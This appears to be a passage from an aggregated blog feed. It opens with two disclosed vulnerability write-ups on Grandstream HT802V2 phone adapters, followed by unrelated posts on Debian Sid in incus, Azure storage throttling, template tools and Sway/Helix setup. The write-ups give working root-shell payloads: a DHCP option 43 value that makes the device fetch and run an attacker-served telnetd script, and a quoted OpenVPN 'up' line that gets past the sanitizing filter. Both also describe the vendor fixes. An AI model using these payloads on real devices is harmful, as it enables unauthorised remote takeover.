        if [ "`head -n 1 ${TEST_SCRIPT}`" = "#!/bin/sh" ]; then
                echo "Starting GS Test Suite..."
                ./${TEST_SCRIPT} http://${TEST_SERVER}:${TEST_SERVER_PORT}
        fi
fi
It uses the passed value to construct the URL http://<gs_test_server>:8080/vendor_test.sh and download it using wget. We probably can construct a gs_test_server value in a way that wget overwrites some system file, like it was suggested in CVE-2021-37915. But we also can just let the script download the file and execute it for us. The only hurdle is that the downloaded file gets decrypted using corefile_dec and the result needs to have #!/bin/sh as the first line to be executed. I have no idea how the encryption works. But luckily we already have a shell using the OpenVPN exploit and can use /bin/encfile to encrypt things! The result gets correctly decrypted by corefile_dec back to the needed payload. That means we can take a simple payload like:
#!/bin/sh
# you need exactly that shebang, yes
telnetd -l /bin/sh -p 1270 &
Encrypt it using encfile and place it on a webserver as vendor_test.sh. The test machine has the IP 192.168.42.222 and python3 -m http.server 8080 runs the webserver on the right port. This means the value of DHCP option 43 needs to be 05, 14 (the length of the string being the IP address) and 192.168.42.222. In Python:
>>> server = "192.168.42.222"
>>> ":".join([f' y:02x ' for y in [5, len(server)] + [ord(x) for x in server]])
'05:0e:31:39:32:2e:31:36:38:2e:34:32:2e:32:32:32'
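Purely as an illustration (this is not part of the original write-up), if dnsmasq were the DHCP server on the test network, the option could be handed out with a single configuration line, since dnsmasq accepts colon-separated hex bytes as an option value:
# /etc/dnsmasq.conf snippet (hypothetical test setup):
# option 43 = 0x05, length 0x0e, then the ASCII bytes of "192.168.42.222"
dhcp-option=43,05:0e:31:39:32:2e:31:36:38:2e:34:32:2e:32:32:32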
So we set DHCP option 43 to 05:0e:31:39:32:2e:31:36:38:2e:34:32:2e:32:32:32 and trigger a DHCP run (/etc/init.d/udhcpc restart if you have a shell, or a plain reboot if you don't). And boom, root shell on port 1270 :) As mentioned earlier, this is closely related to CVE-2021-37915, where a binary was downloaded via TFTP from the gdb_debug_server NVRAM variable or via HTTP from the gs_test_server NVRAM variable. Both of these variables were controllable using the existing gs_config interface after authentication. But using DHCP for the same thing is much nicer, as it removes the need for authentication completely :) Affected devices Fix After disclosing this issue to Grandstream, they have issued a new firmware release (1.0.3.10) which modifies /app/bin/vendor_test_suite.sh to
#!/bin/sh
TEST_SCRIPT=vendor_test.sh
TEST_SERVER=$1
TEST_SERVER_PORT=8080
VENDOR_SCRIPT="/tmp/run_vendor.sh"
cd /tmp
wget -q -t 2 -T 5 http://${TEST_SERVER}:${TEST_SERVER_PORT}/${TEST_SCRIPT}
if [ "$?" = "0" ]; then
    echo "Finished downloading ${TEST_SCRIPT} from http://${TEST_SERVER}:${TEST_SERVER_PORT}"
    chmod +x ${TEST_SCRIPT}
    prov_image_dec --in ${TEST_SCRIPT} --out ${VENDOR_SCRIPT}
    if [ "`head -n 1 ${VENDOR_SCRIPT}`" = "#!/bin/sh" ]; then
        echo "Starting GS Test Suite..."
        chmod +x ${VENDOR_SCRIPT}
        ${VENDOR_SCRIPT} http://${TEST_SERVER}:${TEST_SERVER_PORT}
    fi
fi
The crucial part is that now prov_image_dec is used for the decoding, which actually checks for a signature (like on the firmware image itself), thus preventing loading of malicious scripts. Timeline

12 February 2025

Evgeni Golov: Authenticated RCE via OpenVPN Configuration File in Grandstream HT802V2 and probably others

I have a Grandstream HT802V2 running firmware 1.0.3.5 and while playing around with the VPN settings realized that the sanitization of the "Additional Options" field done for CVE-2020-5739 is not sufficient. Before the fix for CVE-2020-5739, /etc/rc.d/init.d/openvpn did
echo "$(nvram get 8460)" | sed 's/;/\n/g' >> ${CONF_FILE}
After the fix it does
echo "$(nvram get 8460)" | sed -e 's/;/\n/g' | sed -e '/script-security/d' -e '/^[ ]*down /d' -e '/^[ ]*up /d' -e '/^[ ]*learn-address /d' -e '/^[ ]*tls-verify /d' -e '/^[ ]*client-[dis]*connect /d' -e '/^[ ]*route-up/d' -e '/^[ ]*route-pre-down /d' -e '/^[ ]*auth-user-pass-verify /d' -e '/^[ ]*ipchange /d' >> ${CONF_FILE}
That means it deletes all lines that either contain script-security or start with a set of options that allow command execution. Looking at the OpenVPN configuration template (/etc/openvpn/openvpn.conf), it already uses up and therefore sets script-security 2, so injecting that is unnecessary. Thus if one can somehow inject "/bin/ash -c 'telnetd -l /bin/sh -p 1271'" in one of the command-executing options, a reverse shell will be opened. The filtering looks for lines that start with zero or more occurrences of a space, followed by the option name (up, down, etc), followed by another space. While OpenVPN happily accepts tabs instead of spaces in the configuration file, I wasn't able to inject a tab either via the web interface or via SSH/gs_config. However, OpenVPN also allows quoting, which is only documented for parameters, but works just as well for option names too. That means that instead of
up "/bin/ash -c 'telnetd -l /bin/sh -p 1271'"
from the original exploit by Tenable, we write
"up" "/bin/ash -c 'telnetd -l /bin/sh -p 1271'"
this still will be a valid OpenVPN configuration statement, but the filtering in /etc/rc.d/init.d/openvpn won't catch it and the resulting OpenVPN configuration will include the exploit:
# grep -E '(up|script-security)' /etc/openvpn.conf
up /etc/openvpn/openvpn.up
up-restart
;group nobody
script-security 2
"up" "/bin/ash -c 'telnetd -l /bin/sh -p 1271'"
And with that, once the OpenVPN connection is established, a reverse shell is spawned:
/ # uname -a
Linux HT8XXV2 4.4.143 #108 SMP PREEMPT Mon May 13 18:12:49 CST 2024 armv7l GNU/Linux
/ # id
uid=0(root) gid=0(root)
Affected devices Fix After disclosing this issue to Grandstream, they have issued a new firmware release (1.0.3.10) which modifies the filtering to the following:
echo "$(nvram get 8460)" | sed -e 's/;/\n/g' \
                         | sed -e '/script-security/d' \
                               -e '/^["'\'' \f\v\r\n\t]*down["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*up["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*learn-address["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*tls-verify["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*tls-crypt-v2-verify["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*client-[dis]*connect["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*route-up["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*route-pre-down["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*auth-user-pass-verify["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*ipchange["'\'' \f\v\r\n\t]/d' >> ${CONF_FILE}
So far I was unable to inject any further commands in this block. Timeline

1 February 2025

Guido Günther: Free Software Activities January 2025

Another short status update of what happened on my side last month. Mostly focused on quality of life improvements in phosh and cleaning up and improving phoc this time around (including catching up with wlroots git) but some improvements for other things like phosh-osk-stub happened on the side line too. phosh phoc phosh-osk-stub xdg-desktop-portal-phosh phosh-recipes libcmatrix phrog Debian git-buildpackage livi feedbackd Wayland protocols Wlroots Bug reports Reviews This is not code by me but reviews on other peoples code. The list is incomplete, but I hope to improve on this in the upcoming months. Thanks for the contributions! Help Development If you want to support my work see donations. Comments? Join the Fediverse thread

27 January 2025

Sergio Talens-Oliag: Running a Debian Sid on Ubuntu

Although I am a Debian Developer (not very active, BTW) I am using Ubuntu LTS (right now version 24.04.1) on my main machine; it is my work laptop and I was told to keep using Ubuntu on it when it was assigned to me, although I don't believe it is really necessary or justified (I don't need support, I don't provide support to others and I usually test my shell scripts on multiple systems if needed anyway). Initially I kept using Debian Sid on my personal laptop, but I gave it to my oldest son as the one he was using (an old Dell XPS 13) was stolen from him a year ago. I am still using Debian stable on my servers (one at home that also runs LXC containers and another one on an OVH VPS), but I don't have a Debian Sid machine anymore and while I could reinstall my work machine, I've decided I'm going to try to use a system container to run Debian Sid on it. As I want to use a container instead of a VM I've narrowed my options to lxc or systemd-nspawn (I have docker and podman installed, but I don't believe they are good options for running system containers). As I will want to take snapshots of the container filesystem I've decided to try incus instead of systemd-nspawn (I already have experience with it and while it works well it has fewer features than incus).

Installing incusAs this is a personal system where I want to try things, instead of using the packages included with Ubuntu I've decided to install the ones from the zabbly incus stable repository. To do it I've executed the following as root:
# Get the zabbly repository GPG key
curl -fsSL https://pkgs.zabbly.com/key.asc -o /etc/apt/keyrings/zabbly.asc
# Create the zabbly-incus-stable.sources file
sh -c 'cat <<EOF > /etc/apt/sources.list.d/zabbly-incus-stable.sources
Enabled: yes
Types: deb
URIs: https://pkgs.zabbly.com/incus/stable
Suites: $(. /etc/os-release && echo ${VERSION_CODENAME})
Components: main
Architectures: $(dpkg --print-architecture)
Signed-By: /etc/apt/keyrings/zabbly.asc
EOF'
Initially I only plan to use the command line tools, so I've installed the incus and the incus-extra packages, but once things work I'll probably install the incus-ui-canonical package too, at least for testing it:
apt update
apt install incus incus-extra

Adding my personal user to the incus-admin groupTo be able to run incus commands as my personal user I've added it to the incus-admin group:
sudo adduser "$(id -un)" incus-admin
And I've logged out and back in to my desktop session to make the changes effective.

Initializing the incus environmentTo configure the incus environment I've executed the incus admin init command and accepted the defaults for all the questions, as they are good enough for my current use case.
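For reference, a non-interactive variant exists as well; a minimal sketch (assuming a reasonably recent incus where the --minimal flag is available) would be:
# Initialize incus with sane defaults without answering any questions
# (assumption: the --minimal flag is available in this incus version):
incus admin init --minimal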

Creating a Debian containerTo create a Debian container I've used the default debian/trixie image:
incus launch images:debian/trixie debian
This command downloads the image and creates a container named debian using the default profile. The exec command can be used to run a root login shell inside the container:
incus exec debian -- su -l
Instead of exec we can use the shell alias:
incus shell debian
which does the same as the previous command. Inside that shell we can try to update the machine to sid by changing the /etc/apt/sources.list file and using apt:
root@debian:~# echo "deb http://deb.debian.org/debian sid main contrib non-free" \
  >/etc/apt/sources.list
root@debian:~# apt update
root@debian:~# apt dist-upgrade
As my machine has docker installed, the apt update command fails because the network does not work; to fix it I've executed the commands of the following section and re-run the apt update and apt dist-upgrade commands.

Making the incusbr0 bridge work with DockerTo avoid problems with docker networking we have to add rules for the incusbr0 bridge to the DOCKER-USER chain as follows:
sudo iptables -I DOCKER-USER -i incusbr0 -j ACCEPT
sudo iptables -I DOCKER-USER -o incusbr0 -m conntrack \
  --ctstate RELATED,ESTABLISHED -j ACCEPT
That makes things work now, but to make them persistent across reboots we need to add the rules each time the machine boots. As suggested by the incus documentation I've installed the iptables-persistent package (my command also purges the ufw package, as I was not using it) and saved the current rules when installing:
sudo apt install iptables-persistent --purge

Integrating the DNS resolution of the container with the hostTo make DNS resolution for the incus containers work from the host I've followed the incus documentation. To set up things manually I've run the following:
br="incusbr0";
br_ipv4="$(incus network get "$br" ipv4.address)";
br_domain="$(incus network get "$br" dns.domain)";
dns_address="${br_ipv4%/*}";
dns_domain="${br_domain:=incus}";
resolvectl dns "$br" "${dns_address}";
resolvectl domain "$br" "~${dns_domain}";
resolvectl dnssec "$br" off;
resolvectl dnsovertls "$br" off;
And to make the changes persistent across reboots I've created the following service file:
sh -c "cat <<EOF | sudo tee /etc/systemd/system/incus-dns-${br}.service
[Unit]
Description=Incus per-link DNS configuration for ${br}
BindsTo=sys-subsystem-net-devices-${br}.device
After=sys-subsystem-net-devices-${br}.device
[Service]
Type=oneshot
ExecStart=/usr/bin/resolvectl dns ${br} ${dns_address}
ExecStart=/usr/bin/resolvectl domain ${br} ~${dns_domain}
ExecStart=/usr/bin/resolvectl dnssec ${br} off
ExecStart=/usr/bin/resolvectl dnsovertls ${br} off
ExecStopPost=/usr/bin/resolvectl revert ${br}
RemainAfterExit=yes
[Install]
WantedBy=sys-subsystem-net-devices-${br}.device
EOF"
And enabled it:
sudo systemctl daemon-reload
sudo systemctl enable --now incus-dns-${br}.service
If all goes well the DNS resolution works from the host:
$ host debian.incus
debian.incus has address 10.149.225.121
debian.incus has IPv6 address fd42:1178:afd8:cc2c:216:3eff:fe2b:5cea

Using my host user and home dir inside the containerTo use my host user and home directory inside the container I need to add the user and group to the container. First I've added my user group with the same GID used on the host:
incus exec debian -- addgroup --gid "$(id --group)" --allow-bad-names \
  "$(id --group --name)"
Once I have the group I've added the user with the same UID and GID as on the host, without defining a password for it:
incus exec debian -- adduser --uid "$(id --user)" --gid "$(id --group)" \
  --comment "$(getent passwd "$(id --user --name)" | cut -d ':' -f 5)" \
  --no-create-home --disabled-password --allow-bad-names \
  "$(id --user --name)"
Once the user is created we can mount the home directory on the container (we add the shift option to make the container use the same UID and GID as we do on the host):
incus config device add debian home disk source=$HOME path=$HOME shift=true
We have the shell alias to log in with the root account; now we can add another one to log into the container using the newly created user:
incus alias add ush "exec @ARGS@ -- su -l $(id --user --name)"
To log into the container as our user now we just need to run:
incus ush debian
To be able to use sudo inside the container we could add our user to the sudo group:
incus exec debian -- adduser "$(id --user --name)" "sudo"
But that requires a password and we don't have one, so instead we are going to add a file to the /etc/sudoers.d directory to allow our user to run sudo without a password:
incus exec debian -- \
  sh -c "echo '$(id --user --name) ALL = NOPASSWD: ALL' > /etc/sudoers.d/user"

Accessing the container using sshTo use the container as a real machine and log into it as I do on remote machines I've installed the openssh-server package and authorized my laptop public key to log into the container (as we are mounting the home directory from the host, that allows us to log in without a password from the local machine). Also, to be able to run X11 applications from the container I've adjusted the $HOME/.ssh/config file to always forward X11 (option ForwardX11 yes for Host debian.incus) and installed the xauth package. After that I can log into the container running the command ssh debian.incus and start using it after installing other interesting tools like neovim, rsync, tmux, etc.
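For reference, the relevant part of the $HOME/.ssh/config looks more or less like this (a minimal sketch; the Host name matches the container's DNS name from the previous section):
cat >> "$HOME/.ssh/config" <<'EOF'
Host debian.incus
    ForwardX11 yes
EOF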

Taking snapshots of the containerAs this is a system container we can take snapshots of it using the incus snapshot command; that can be especially useful to take snapshots before doing a dist-upgrade so we can roll back if something goes wrong. To work with container snapshots we use the incus snapshot command, i.e. to create a snapshot we use the create subcommand:
incus snapshot create debian
The snapshot subcommands include options to list the available snapshots, restore a snapshot, delete a snapshot, etc.
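For reference, those subcommands follow the same pattern; snap0 is just the default name incus gives to the first snapshot, used here as an example:
incus snapshot list debian             # list the available snapshots
incus snapshot restore debian snap0    # roll the container back to a snapshot
incus snapshot delete debian snap0     # remove a snapshot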

ConclusionSince last week I have a terminal running a tmux session on the Debian Sid container with multiple zsh windows open (I've changed the prompt to be able to notice easily where I am) and it is working as expected. My plan now is to add some packages and use the container for personal projects so I can work on a Debian Sid system without having to reinstall my work machine. I'll probably write more about it in the future, but for now, I'm happy with the results.

18 January 2025

Dominique Dumont: How we solved storage API throttling on our Azure Kubernetes clusters

Hi! This issue was quite puzzling, so I'm sharing how we investigated it. I hope it can be useful for you. My client informed me that he was no longer able to install new instances of his application. k9s showed that only some pods could not be created, only the ones that created physical volumes (PV). The description of these pods showed an HTTP error 429 when creating pods: new PVCs could not be created because we were throttled by the Azure storage API. This issue was confirmed by the Azure diagnostic console on Kubernetes (menu Diagnose and solve problems → Cluster and Control Plane Availability and Performance → Azure Resource Request Throttling). We had a lot of throttling:
2025-01-18_11-01-k8s-throttles.png
Which were explained by the high call rate:
2025-01-18_11-01-k8s-calls.png
The first clue was found at the bottom of Azure diagnostic page:
2025-01-18_11-27-throttles-by-user-agent.png
According, to this page, throttling is done by services whose user agent is:
Go/go1.23.1 (amd64-linux) go-autorest/v14.2.1 Azure-SDK-For-Go/v68.0.0
storage/2021-09-01microsoft.com/aks-operat azsdk-go-armcompute/v1.0.0 (go1.22.3; linux)
The main information is Azure-SDK-For-Go, which means the program making all these calls to the storage API is written in Go. All our services are written in Typescript or Rust, so they are not suspect. That leaves controllers running in the kube-system namespace. I could not find anything suspect in the logs of these services. At that point I was convinced that a component in the Kubernetes control plane was making all those calls. Unfortunately, AKS is managed by Microsoft and I don't have access to the control plane logs. However, we realized that we had quite a lot of volumesnapshots that are created in our clusters using k8s-scheduled-volume-snapshotter: we suspected that the kubernetes reconciliation loop is throttled when checking the status of all these snapshots. Maybe so, but we also had the same issues and throttle rates on preprod and prod, where the number of snapshots was quite different. We tried to get more information using the Azure console on our snapshot account, but it was also broken by the throttling issue. We were so puzzled that we decided to try Léodagan's advice ("tout cramer pour repartir sur des bases saines", loosely translated as "burn everything down to start from scratch") and we destroyed piece by piece our dev cluster while checking if the throttling stopped. First, we removed all our applications, no change. Then, all ancillary components like rabbitmq, cert-manager were removed, no change. Then, we tried to remove the namespace containing our applications. But we faced another issue: Kubernetes was unable to remove the namespace because it could not destroy some PVC and volumesnapshots. That was actually good news, because it meant that we were close to the actual issue. We managed to destroy the PVC and volumesnapshots by removing their finalizers. Finalizers are some kind of markers that tell kubernetes that something needs to be done before actually deleting a resource. The finalizers were removed with a command like:
kubectl patch volumesnapshots ${volumesnapshot} \
  -p '{\"metadata\":{\"finalizers\":null}}' --type merge
Then, we got the first progress: the throttling and high call rate stopped on our dev cluster. To make sure that the snapshots were the issue, we re-installed the ancillary components and our applications. Everything was copacetic. So, the problem was indeed with PVC and snapshots. Even though we have backups outside of Azure, we weren't really thrilled at trying Léodagan's method on our prod cluster. So we looked for a better fix to try on our preprod cluster. Poking around in PVC and volumesnapshots, I finally found this error message in the description of a volumesnapshotcontents:
Code="ShareSnapshotCountExceeded" Message="The total number of snapshots
for the share is over the limit."
The number of snapshots found in our cluster was not that high. So I wanted to check the snapshots present in our storage account using Azure console, which was still broken. Fortunately, Azure CLI is able to retry HTTP calls when getting 429 errors. I managed to get a list of snapshots with
az storage share list --account-name [redacted] --include-snapshots \
    | tee preprod-list.json
There, I found a lot of snapshots dating back to 2024. These were no longer managed by Kubernetes and should have been cleaned up. That was our smoking gun. I guess that we had a chain of events like: To make things worse, k8s-scheduled-volume-snapshotter creates new snapshots when it cannot list the old ones. So we had 4 new snapshots per day instead of one. Since we had the chain of events, fixing the issue was not too difficult (but quite long):
  1. stop k8s-scheduled-volume-snapshotter by disabling its cron job
  2. delete all volumesnapshots and volume snapshots contents from k8s.
  3. since Azure API was throttled, we also had to remove their finalizers
  4. delete all snapshots from azure using the az command and a Perl script (this step took several hours; see the sketch after this list)
  5. re-enable k8s-scheduled-volume-snapshotter
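A rough sketch of step 4, assuming the listing saved earlier in preprod-list.json; the jq field names (.name and .snapshot) and this particular az invocation are assumptions based on the documented CLI, not the actual Perl script we used:
# Hypothetical sketch: delete every share snapshot found in the earlier listing.
jq -r '.[] | select(.snapshot != null) | "\(.name) \(.snapshot)"' preprod-list.json |
  while read -r share snapshot; do
    az storage share delete --account-name [redacted] \
      --name "$share" --snapshot "$snapshot"
  done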
After these steps, preprod was back to normal. I'm now applying the same recipe on prod. We still don't know why we had all these stale snapshots. It may have been a human error or a bug in k8s-scheduled-volume-snapshotter. Anyway, to avoid this problem in the future, we will: My name is Dominique Dumont, I'm a devops freelance. You can find the devops and audit services I propose on my website or reach out to me on LinkedIn. All the best

16 January 2025

Sergio Talens-Oliag: Command line tools to process templates

I've always been a fan of template engines that work with text files, mainly to work with static site generators, but also to generate code, configuration files, and other text-based files. For my own web projects I used to go with Jinja2, as all my projects were written in Python, while for static web sites I used the template engines included with the tools I was using, i.e. Liquid with Jekyll and Go Templates (based on the text/template and the html/template go packages) for Hugo. When I needed to generate code snippets or configuration files from shell scripts I used to go with sed and/or envsubst, but lately things got complicated and I started to use a command line application called tmpl that uses the Go Template Language with functions from the Sprig library.
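As a minimal sketch of that sed/envsubst workflow (the file and variable names here are made up), envsubst substitutes exported environment variables into a template read from stdin:
# nginx.conf.tmpl contains e.g.:  listen ${PORT};
export PORT=8080
envsubst < nginx.conf.tmpl > nginx.conf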

tmplI've been using my fork of the tmpl program to process templates on CI/CD pipelines (gitlab-ci) to generate configuration files and code snippets because it uses the same syntax used by helm (easier to use by other DevOps already familiar with the format) and the binary is small and can be easily included into the docker images used by the pipeline jobs. One interesting feature of the tmpl tool is that it can read values from command line arguments and from multiple files in different formats (YAML, JSON, TOML, etc) and merge them into a single object that can be used to render the templates. There are alternatives to the tmpl tool and I've looked at them (i.e. simple ones like go-template-cli or complex ones like gomplate), but I haven't found one that fits my needs. For my next project I plan to evaluate a move to a different tool or template format, as tmpl is not being actively maintained (as I said, I'm using my own fork) and it is not included in existing GNU/Linux distributions (I packaged it for Debian and Alpine, but I don't want to maintain something like that without an active community and I'm not interested in being the upstream myself, as I'm trying to move to Rust instead of Go as the compiled programming language for my projects).

Mini JinjaLooking for alternate tools to process templates on the command line I found the minijinja rust crate, a minimal implementation of the Jinja2 template engine that also includes a small command line utility (minijinja-cli), and I believe I'll give it a try in the future for various reasons (a small usage sketch follows the list below):
  • I m already familiar with the Jinja2 syntax and it is widely used on the industry.
  • On my code I can use the original Jinja2 module for Python projects and MiniJinja for Rust programs.
  • The included command line utility is small and easy to use, and the binaries distributed by the project are good enough to add them to the docker container images used by CI/CD pipelines.
  • As I want to move to Rust I can try to add functionalities to the existing command line client or create my own version of it if they are needed (I don't think so, but who knows).
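A quick usage sketch (the file names are made up): minijinja-cli takes a template and an optional data file whose format is detected from its extension:
# values.json:  { "name": "world" }
# hello.j2:     Hello {{ name }}!
minijinja-cli hello.j2 values.json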

10 January 2025

Sergio Talens-Oliag: Testing New User Tools

In recent weeks I've had some time to scratch my own itch on matters related to tools I use daily on my computer, namely the desktop / window manager and my text editor of choice. This post is a summary of what I tried, how it worked out and my short and medium-term plans related to them.

Desktop / WMOn the desktop / window manager front I've been using Cinnamon on Debian and Ubuntu systems since Gnome 3 was published (I never liked version 3, so I decided to move to something similar to Gnome 2, including the keyboard shortcuts). In fact I've never been a fan of Desktop environments; before Gnome I used OpenBox and IceWM because they were a lot faster than desktop systems on my hardware at the time and I was using them only to place one or two windows on multiple workspaces using mainly the keyboard for my interactions (well, except for the web browsers and the image manipulation programs). Although I was comfortable using Cinnamon, some years ago I tried to move to i3, a tiling window manager for X11 that looked like a good choice for me, but I didn't have much time to play with it and never used it enough to make me productive with it (I didn't prepare a complete configuration nor had enough time to learn the new shortcuts, so I went back to Cinnamon and never tried again). Anyway, some weeks ago I updated my work machine OS (it was using Ubuntu 22.04 LTS and I updated it to the 24.04 LTS version) and the Cinnamon systray applet stopped working as it used to do (in fact I still have to restart Cinnamon after starting a session to make it work) and, as I had some time, I decided to try a tiling window manager again, but now I decided to go for SwayWM, as it uses Wayland instead of X11.

Sway configurationOn my ~/.config/sway/config I tuned some things:
  • Set fuzzel as the application launcher.
  • Installed manually the shikane application and created a configuration to be executed always when sway is started / reloaded (I adjusted my configuration with wdisplays and used shikanectl to save it).
  • Added support for running the xdg-desktop-portal-wlr service.
  • Enabled the swayidle command to lock the screen after some time of inactivity.
  • Adjusted the keyboard to use the es key map
  • Added some keybindings to make my life easier, including the use of grim and swappy to take screenshots
  • Configured waybar as the environment bar.
  • Added a shell script to start applications when sway is started (it uses swaymsg to execute background commands and the i3toolwait script to wait for the
    #!/bin/sh
    # VARIABLES
    CHROMIUM_LOCAL_STATE="$HOME/.config/google-chrome/Local State"
    I3_TOOLWAIT="$HOME/.config/sway/scripts/i3-toolwait"
    # Functions
    chromium_profile_dir() {
      jq -r ".profile.info_cache | to_entries | map({(.value.name): .key}) | add | .\"$1\" // \"\"" "$CHROMIUM_LOCAL_STATE"
    }
    # MAIN
    IGZ_PROFILE_DIR="$(chromium_profile_dir "sergio.talens@intelygenz.com")"
    OURO_PROFILE_DIR="$(chromium_profile_dir "sergio.talens@nxr.global")"
    PERSONAL_PROFILE_DIR="$(chromium_profile_dir "stalens@gmail.com")"
    # Common programs
    swaymsg "exec nextcloud --background"
    swaymsg "exec nm-applet"
    # Run spotify on the first workspace (it is mapped to the laptop screen)
    swaymsg -q "workspace 1"
    ${I3_TOOLWAIT} "spotify"
    # Run tmux on the second workspace
    swaymsg -q "workspace 2"
    ${I3_TOOLWAIT} -- foot tmux a -dt sto
    wp_num="3"
    if [ "$OURO_PROFILE_DIR" ]; then
      swaymsg -q "workspace $wp_num"
      ${I3_TOOLWAIT} -m ouro-browser -- google-chrome --profile-directory="$OURO_PROFILE_DIR"
      wp_num="$((wp_num+1))"
    fi
    if [ "$IGZ_PROFILE_DIR" ]; then
      swaymsg -q "workspace $wp_num"
      ${I3_TOOLWAIT} -m igz-browser -- google-chrome --profile-directory="$IGZ_PROFILE_DIR"
      wp_num="$((wp_num+1))"
    fi
    if [ "$PERSONAL_PROFILE_DIR" ]; then
      swaymsg -q "workspace $wp_num"
      ${I3_TOOLWAIT} -m personal-browser -- google-chrome --profile-directory="$PERSONAL_PROFILE_DIR"
      wp_num="$((wp_num+1))"
    fi
    # Open the browser without setting the profile directory if none was found
    if [ "$wp_num" = "3" ]; then
      swaymsg -q "workspace $wp_num"
      ${I3_TOOLWAIT} google-chrome
      wp_num="$((wp_num+1))"
    fi
    swaymsg -q "workspace $wp_num"
    ${I3_TOOLWAIT} evolution
    wp_num="$((wp_num+1))"
    swaymsg -q "workspace $wp_num"
    ${I3_TOOLWAIT} slack
    wp_num="$((wp_num+1))"
    # Open a private browser and a console in the last workspace
    swaymsg -q "workspace $wp_num"
    ${I3_TOOLWAIT} -- google-chrome --incognito
    ${I3_TOOLWAIT} foot
    # Go back to the second workspace for keepassxc
    swaymsg "workspace 2"
    ${I3_TOOLWAIT} keepassxc

ConclusionAfter using Sway for some days I can confirm that it is a good choice for me, but some of the components needed to make it work as I want are too new and not available on the Ubuntu 24.04 LTS repositories, so I decided to go back to Cinnamon and try Sway again in the future, although I added more workspaces to my setup (now they are only available on the main monitor, the laptop screen is fixed while there is a big monitor connected), added some additional keyboard shortcuts and installed or updated some applets.

Text editorWhen I started using Linux many years ago I used vi/vim and emacs as my text editors (vi for plain text and emacs for programming and editing HTML/XML), but eventually I moved to vim as my main text editor and I've been using it since (well, I moved to neovim some time ago, although I kept my old vim configuration). To be fair I'm not as expert as I could be with vim, but I'm productive with it and it has many plugins that make my life easier on my machines, while keeping my ability to edit text and configurations on any system that has a vi compatible editor installed. For work reasons I tried to use Visual Studio Code last year, but I've never really liked it and almost everything I do with it I can do with neovim (i.e. I even use copilot with it). Besides, I'm a heavy terminal user (I use tmux locally and via ssh) and I like to be able to use my text editor on my shell sessions, and code does not work like that. The only annoying thing about vim/neovim is its configuration (well, the problem is that I have a very old one and probably should spend some time fixing and updating it), but, as I said, it's been working well for me for a long time, so I never really had the motivation to do it. Anyway, after finishing my desktop tests I saw that I had the Helix editor installed for some time but I never tried it, so I decided to give it a try and see if it could be a good replacement for neovim on my environments (the only drawback is that as it is not vi compatible, I would need to switch back to vi mode when working on remote systems, but I guess I could live with that). I ran the helix tutorial and I liked it, so I decided to configure and install the Language Servers I can probably take advantage of on my daily work on my personal and work machines and see how it works.

Language server installationsA lot of manual installations are needed to get the language servers working; what I did on my machines is more or less the following:
# AWK
sudo npm i -g 'awk-language-server@>=0.5.2'
# BASH
sudo apt-get install shellcheck shfmt
sudo npm i -g bash-language-server
# C/C++
sudo apt-get install clangd
# CSS, HTML, ESLint, JSON, SCS
sudo npm i -g vscode-langservers-extracted
# Docker
sudo npm install -g dockerfile-language-server-nodejs
# Docker compose
sudo npm install -g @microsoft/compose-language-service
# Helm
app="helm_ls_linux_amd64"
url="$(
  curl -s https://api.github.com/repos/mrjosh/helm-ls/releases/latest |
    jq -r ".assets[] | select(.name == \"$app\") | .browser_download_url"
)"
curl -L "$url" --output /tmp/helm_ls
sudo install /tmp/helm_ls /usr/local/bin
rm /tmp/helm_ls
# Markdown
app="marksman-linux-x64"
url="$(
  curl -s https://api.github.com/repos/artempyanykh/marksman/releases/latest |
    jq -r ".assets[] | select(.name == \"$app\") | .browser_download_url"
)"
curl -L "$url" --output /tmp/marksman
sudo install /tmp/marksman /usr/local/bin
rm /tmp/marksman
# Python
sudo npm i -g pyright
# Rust
rustup component add rust-analyzer
# SQL
sudo npm i -g sql-language-server
# Terraform
sudo apt-get install terraform-ls
# TOML
cargo install taplo-cli --locked --features lsp
# YAML
sudo npm install --global yaml-language-server
# JavaScript, TypeScript
sudo npm install -g typescript-language-server typescript
sudo npm install -g --save-dev --save-exact @biomejs/biome

Helix configurationThe helix configuration is done with a couple of toml files that are placed in the ~/.config/helix directory; the config.toml file I used is this one:
theme = "solarized_light"
[editor]
line-number = "relative"
mouse = false
[editor.statusline]
left = ["mode", "spinner"]
center = ["file-name"]
right = ["diagnostics", "selections", "position", "file-encoding", "file-line-ending", "file-type"]
separator = " "
mode.normal = "NORMAL"
mode.insert = "INSERT"
mode.select = "SELECT"
[editor.cursor-shape]
insert = "bar"
normal = "block"
select = "underline"
[editor.file-picker]
hidden = false
[editor.whitespace]
render = "all"
[editor.indent-guides]
render = true
character = " " # Some characters that work well: " ", " ", " ", " "
skip-levels = 1
And to configure the language servers I used the following language-servers.toml file:
[[language]]
name = "go"
auto-format = true
formatter = { command = "goimports" }
[[language]]
name = "javascript"
language-servers = [
  "typescript-language-server", # optional
  "vscode-eslint-language-server",
]
[language-server.rust-analyzer.config.check]
command = "clippy"
[language-server.sql-language-server]
command = "sql-language-server"
args = ["up", "--method", "stdio"]
[[language]]
name = "sql"
language-servers = [ "sql-language-server" ]
[[language]]
name = "hcl"
language-servers = [ "terraform-ls" ]
language-id = "terraform"
[[language]]
name = "tfvars"
language-servers = [ "terraform-ls" ]
language-id = "terraform-vars"
[language-server.terraform-ls]
command = "terraform-ls"
args = ["serve"]
[[language]]
name = "toml"
formatter = { command = "taplo", args = ["fmt", "-"] }
[[language]]
name = "typescript"
language-servers = [
  "typescript-language-server",
  "vscode-eslint-language-server",
]

Neovim configurationAfter a little while I noticed that I was going to need some time to get used to helix, and the most interesting things for me were the easy configuration and the language server integrations; but as I am already comfortable with neovim and had just installed the language server support tools on my machines, I just need to configure them for neovim and I can keep using it for a while. As I said my configuration is old; to configure neovim I have the following init.vim file in my ~/.config/nvim folder:
set runtimepath^=~/.vim runtimepath+=~/.vim/after
let &packpath=&runtimepath
source ~/.vim/vimrc
" load lua configuration
lua require('config')
